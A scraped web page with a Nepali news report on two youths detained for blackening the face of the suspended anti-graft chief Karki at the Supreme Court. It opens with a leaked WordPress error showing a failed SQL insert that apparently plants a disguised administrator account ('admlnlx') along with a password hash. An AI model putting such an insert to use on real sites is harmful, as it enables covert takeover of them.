WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7fc6iABPt.W.e92alqs5Cjt.ouztH/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:17:49', '', 'admlnlx', 'admlnlx')
काठमान्डौं,पुस ८-
अख्तियारका निलम्बित प्रमुख कार्कीमाधि आक्रमण गर्दै कालो मोसो दल्ने दुई युवालाई सात दिन थुनामा राख्न जिल्ला प्रशासन कार्यालय काठमाडौंले अनुमति दिएको छ ।
उनीहरुलाई महानगरीय प्रहरी परिसर काठमाडौंले सार्वजनिक अपराध ऐन अन्तरगत मुद्दा चलाउने तयारी गरेको छ । र, अनुसन्धानका लागि हिरासतमा राख्न म्याद थपका लागि शुक्रबार जिल्ला प्रशासन कार्यालय काठमाडौंमा उपस्थित गराएको थियो ।
प्रशासनले ७ दिन म्याद थुनामा राख्न अनुमति दिएको महानगरीय प्रहरी परिसर काठमाडौंका निमित्त प्रमुख प्रद्युम्न कार्कीले बताए ।
विप्लव माओवादी निकट अखिल क्रान्तिकारीका केन्द्रीय सदस्यद्वय प्रकाश शाही र चन्द्रबहादुर बुढाले सर्बोच्च अदालतभित्रै लोकमानलाई आक्रमण गर्दै कालोमोसो दलिदिएका थिए । कालोमोसो दल्ने दाङका शाही र रुकुमका बुढा दुबैलाई प्रहरीले तत्कालै नियन्त्रणमा लिएको थियो ।
सार्वजनिक अपराधको अभियोग प्रमाणित भएमा एक वर्षसम्म कैद सजाय हुनसक्छ । तर, कार्कीले भने दुबैलाई अवोध कारिन्दा भन्दै विना कारबाही छाड्न प्रहरीलाई आग्रह गरेका छन् ।